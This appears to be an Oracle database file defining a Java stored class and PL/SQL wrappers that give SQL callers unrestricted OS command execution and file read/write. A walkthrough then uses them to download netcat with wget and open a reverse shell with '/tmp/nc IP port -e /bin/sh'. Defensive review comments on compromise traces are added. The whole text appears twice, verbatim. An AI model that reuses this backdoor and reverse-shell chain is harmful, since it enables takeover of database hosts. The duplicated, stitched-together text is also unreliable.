-- Oracle DDL: stores the Java source below in the database under the name "oraexec" and compiles it.
-- The class gives SQL callers OS command execution plus file read and file append on the database
-- host, with no restriction on the command or path. An object like this in a schema should be
-- treated as a likely sign of compromise or of an unsanctioned test until proven otherwise.
-- NOTE(review): the methods presumably only succeed when the owning schema holds the matching
-- Oracle JVM permissions (java.io.FilePermission read/write/execute, or a broad role such as
-- JAVASYSPRIV) - confirm by auditing DBA_JAVA_POLICY and Java-related role grants, and look for
-- unexpected JAVA SOURCE / JAVA CLASS objects in DBA_OBJECTS.
create or replace and compile java source named oraexec as
import java.lang.*;
import java.io.*;
public class oraexec {
/*
* Copies inputStream to outStream in chunks of up to 1024 bytes until end-of-stream,
* after printing a "========type========" banner on System.out.
* Each chunk is also printed with System.out.println (decoded with the platform default
* charset), so when outStream is System.out, as in execCommand, the data appears twice.
* Neither stream is closed here.
*/
private static void copyStream(InputStream inputStream, OutputStream outStream,String type) throws IOException {
byte[] bytes = new byte[1024];
int len = 0;
System.out.println("========"+type+"========");
while ( (len = inputStream.read(bytes)) != -1)
{
System.out.println(new String(bytes,0,len));
outStream.write(bytes,0,len);
}
}
/*
* Command execution module.
* Hands the caller-supplied string to Runtime.exec unchanged and echoes the child's
* standard output, then its standard error, to System.out.
* There is no validation or allow-list: whoever can call this method chooses the program.
* Standard output is read to end-of-stream before standard error is touched, and the
* child's exit status is never collected.
* NOTE(review): the child presumably runs under the OS account of the database server
* process - confirm for the deployment.
*/
public static void execCommand(String command) throws IOException {
Process pc = Runtime.getRuntime().exec(command);
copyStream(pc.getInputStream(), System.out,"InputStream()");
copyStream(pc.getErrorStream(), System.out,"ErrorStream()");
}
/*
* File reading module.
* Opens the caller-supplied path and prints its contents to System.out line by line.
* This code places no restriction on the path; only JVM and OS permissions limit what is read.
* The reader is closed on the normal path only; an IOException while reading leaves it open.
*/
public static void readFile(String filename) throws IOException {
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();
while (text != null) {
System.out.println(text);
text = fr.readLine();
}
fr.close();
}
/*
* File writing module.
* Appends the given line followed by "\n" to the caller-supplied path; FileWriter in
* append mode creates the file when it does not exist.
* This code places no restriction on the path or the content written.
* The writer is closed on the normal path only; an IOException while writing leaves it open.
*/
public static void writeFile(String filename, String line) throws IOException {
FileWriter f = new FileWriter(filename, true); /* append */
BufferedWriter fw = new BufferedWriter(f);
fw.write(line);
fw.write("\n");
fw.close();
}
}
============================================
CODE_2:
-- Call spec: publishes the static Java method oraexec.execCommand as the PL/SQL procedure javacmd.
-- The value of p_command is passed to that method as its single String argument.
-- NOTE(review): no AUTHID clause is given - check which rights model applies and who holds
-- EXECUTE on this procedure; a procedure exposing OS command execution should not exist in a
-- production schema.
-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java
name 'oraexec.execCommand(java.lang.String)';
===========================================
CODE_3:
-- Call spec: publishes the static Java method oraexec.readFile as the PL/SQL procedure javareadfile.
-- The file contents are written to the Java System.out, which is why the usage below first
-- redirects Java output (dbms_java.set_output) and enables serveroutput in the client.
-- NOTE(review): p_filename is an arbitrary server-side path; review EXECUTE grants on this
-- procedure and the Java file permissions of the owning schema.
-- usage: exec dbms_java.set_output(2000);
-- set serveroutput on;
-- exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';
============================================
CODE_4:
-- Call spec: publishes the static Java method oraexec.writeFile as the PL/SQL procedure javawritefile.
-- p_filename and p_line map to the method's two String arguments, in that order.
-- NOTE(review): p_filename is an arbitrary server-side path and p_line arbitrary content; review
-- EXECUTE grants on this procedure and the Java file permissions of the owning schema.
-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';
4、
-- Walkthrough as published: a one-line script is staged in /tmp and run through javacmd, then a
-- second script is staged and run the same way.
-- For responders, the traces this sequence leaves are: the files /tmp/getnc, /tmp/nc and /tmp/shell
-- (presumably owned by the database OS account), /bin/sh started as a child of the database server
-- process, an outbound HTTP fetch from the database host, and an outbound connection with /bin/sh
-- attached to it.
-- Egress filtering on the database host and alerting on shells spawned by the database process
-- address each of these steps.
exec javawritefile('/tmp/getnc', 'wget http://www/nc -O /tmp/nc'); //write the wget command for nc into the file getnc
exec dbms_java.set_output(2000); //set up Java output for javareadfile
set serveroutput on;
exec javareadfile('/tmp/getnc'); //read the file back to check that the write succeeded
exec javacmd('/bin/sh /tmp/getnc'); //run the command to download nc
exec javareadfile('/tmp/nc'); //check whether nc was downloaded
exec javawritefile('/tmp/shell', '/tmp/nc IP port -e /bin/sh'); //write the reverse-connection command
exec javareadfile('/tmp/shell'); //read the file back to check that the write succeeded
exec javacmd('/bin/sh /tmp/shell'); //run nc to connect a shell back; a local nc listener then receives the shell; if it does not work, check the firewall
import java.lang.*;
import java.io.*;
/*
* Helper class meant to be loaded into an Oracle database as a Java stored source.
* It gives callers OS command execution plus file read and file append on the host,
* with no restriction on the command or path. A class like this inside a database schema
* should be treated as a likely sign of compromise or of an unsanctioned test.
* NOTE(review): the methods presumably only succeed when the owning schema holds the
* matching Oracle JVM permissions (java.io.FilePermission read/write/execute, or a broad
* role such as JAVASYSPRIV) - confirm by auditing DBA_JAVA_POLICY and role grants.
*/
public class oraexec {
/*
* Copies inputStream to outStream in chunks of up to 1024 bytes until end-of-stream,
* after printing a "========type========" banner on System.out.
* Each chunk is also printed with System.out.println (decoded with the platform default
* charset), so when outStream is System.out, as in execCommand, the data appears twice.
* Neither stream is closed here.
*/
private static void copyStream(InputStream inputStream, OutputStream outStream,String type) throws IOException {
byte[] bytes = new byte[1024];
int len = 0;
System.out.println("========"+type+"========");
while ( (len = inputStream.read(bytes)) != -1)
{
System.out.println(new String(bytes,0,len));
outStream.write(bytes,0,len);
}
}
/*
* Command execution module.
* Hands the caller-supplied string to Runtime.exec unchanged and echoes the child's
* standard output, then its standard error, to System.out.
* There is no validation or allow-list: whoever can call this method chooses the program.
* Standard output is read to end-of-stream before standard error is touched, and the
* child's exit status is never collected.
* NOTE(review): the child presumably runs under the OS account of the database server
* process - confirm for the deployment.
*/
public static void execCommand(String command) throws IOException {
Process pc = Runtime.getRuntime().exec(command);
copyStream(pc.getInputStream(), System.out,"InputStream()");
copyStream(pc.getErrorStream(), System.out,"ErrorStream()");
}
/*
* File reading module.
* Opens the caller-supplied path and prints its contents to System.out line by line.
* This code places no restriction on the path; only JVM and OS permissions limit what is read.
* The reader is closed on the normal path only; an IOException while reading leaves it open.
*/
public static void readFile(String filename) throws IOException {
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();
while (text != null) {
System.out.println(text);
text = fr.readLine();
}
fr.close();
}
/*
* File writing module.
* Appends the given line followed by "\n" to the caller-supplied path; FileWriter in
* append mode creates the file when it does not exist.
* This code places no restriction on the path or the content written.
* The writer is closed on the normal path only; an IOException while writing leaves it open.
*/
public static void writeFile(String filename, String line) throws IOException {
FileWriter f = new FileWriter(filename, true); /* append */
BufferedWriter fw = new BufferedWriter(f);
fw.write(line);
fw.write("\n");
fw.close();
}
}
============================================
CODE_2:
-- Call spec: publishes the static Java method oraexec.execCommand as the PL/SQL procedure javacmd.
-- The value of p_command is passed to that method as its single String argument.
-- NOTE(review): no AUTHID clause is given - check which rights model applies and who holds
-- EXECUTE on this procedure; a procedure exposing OS command execution should not exist in a
-- production schema.
-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language java
name 'oraexec.execCommand(java.lang.String)';
===========================================
CODE_3:
-- Call spec: publishes the static Java method oraexec.readFile as the PL/SQL procedure javareadfile.
-- The file contents are written to the Java System.out, which is why the usage below first
-- redirects Java output (dbms_java.set_output) and enables serveroutput in the client.
-- NOTE(review): p_filename is an arbitrary server-side path; review EXECUTE grants on this
-- procedure and the Java file permissions of the owning schema.
-- usage: exec dbms_java.set_output(2000);
-- set serveroutput on;
-- exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language java
name 'oraexec.readFile(java.lang.String)';
============================================
CODE_4:
-- Call spec: publishes the static Java method oraexec.writeFile as the PL/SQL procedure javawritefile.
-- p_filename and p_line map to the method's two String arguments, in that order.
-- NOTE(review): p_filename is an arbitrary server-side path and p_line arbitrary content; review
-- EXECUTE grants on this procedure and the Java file permissions of the owning schema.
-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language java
name 'oraexec.writeFile(java.lang.String, java.lang.String)';
4、
-- Walkthrough as published: a one-line script is staged in /tmp and run through javacmd, then a
-- second script is staged and run the same way.
-- For responders, the traces this sequence leaves are: the files /tmp/getnc, /tmp/nc and /tmp/shell
-- (presumably owned by the database OS account), /bin/sh started as a child of the database server
-- process, an outbound HTTP fetch from the database host, and an outbound connection with /bin/sh
-- attached to it.
-- Egress filtering on the database host and alerting on shells spawned by the database process
-- address each of these steps.
exec javawritefile('/tmp/getnc', 'wget http://www/nc -O /tmp/nc'); //write the wget command for nc into the file getnc
exec dbms_java.set_output(2000); //set up Java output for javareadfile
set serveroutput on;
exec javareadfile('/tmp/getnc'); //read the file back to check that the write succeeded
exec javacmd('/bin/sh /tmp/getnc'); //run the command to download nc
exec javareadfile('/tmp/nc'); //check whether nc was downloaded
exec javawritefile('/tmp/shell', '/tmp/nc IP port -e /bin/sh'); //write the reverse-connection command
exec javareadfile('/tmp/shell'); //read the file back to check that the write succeeded
exec javacmd('/bin/sh /tmp/shell'); //run nc to connect a shell back; a local nc listener then receives the shell; if it does not work, check the firewall